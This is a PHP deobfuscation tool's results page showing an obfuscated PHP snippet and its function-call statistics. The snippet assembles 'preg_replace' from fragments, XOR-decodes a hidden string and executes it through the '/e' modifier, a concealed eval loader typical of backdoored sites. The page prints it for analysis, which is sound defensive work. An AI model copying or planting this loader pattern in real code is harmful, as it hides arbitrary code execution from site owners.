Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $md='lace';$md='ep'.$md;$md='g_r'.$md;$md='pre'.$md;$mc='eCVO]Y\'8UIV[UH9uKYCV[YHA..
Decoded Output download
<?php $md='lace';$md='ep'.$md;$md='g_r'.$md;$md='pre'.$md;$mc='eCVO]Y\'8UIV[UH9uKYCV[YHA]';$xsr=$xch=substr($mc,0,1);for($ich=1;$ich<strlen($mc);$ich++){$xsr.=$xch=chr(ord(substr($mc,$ich,1))-32)^$xch^'g';};$md('/.+/e',$xsr,$mc); ?>
Did this file decode correctly?
Original Code
<?php $md='lace';$md='ep'.$md;$md='g_r'.$md;$md='pre'.$md;$mc='eCVO]Y\'8UIV[UH9uKYCV[YHA]';$xsr=$xch=substr($mc,0,1);for($ich=1;$ich<strlen($mc);$ich++){$xsr.=$xch=chr(ord(substr($mc,$ich,1))-32)^$xch^'g';};$md('/.+/e',$xsr,$mc); ?>
Function Calls
chr | 61 |
ord | 61 |
strlen | 62 |
substr | 62 |
preg_replace | 1 |
Stats
MD5 | ad945fec91f0e2d037a770ef24238286 |
Eval Count | 2 |
Decode Time | 337 ms |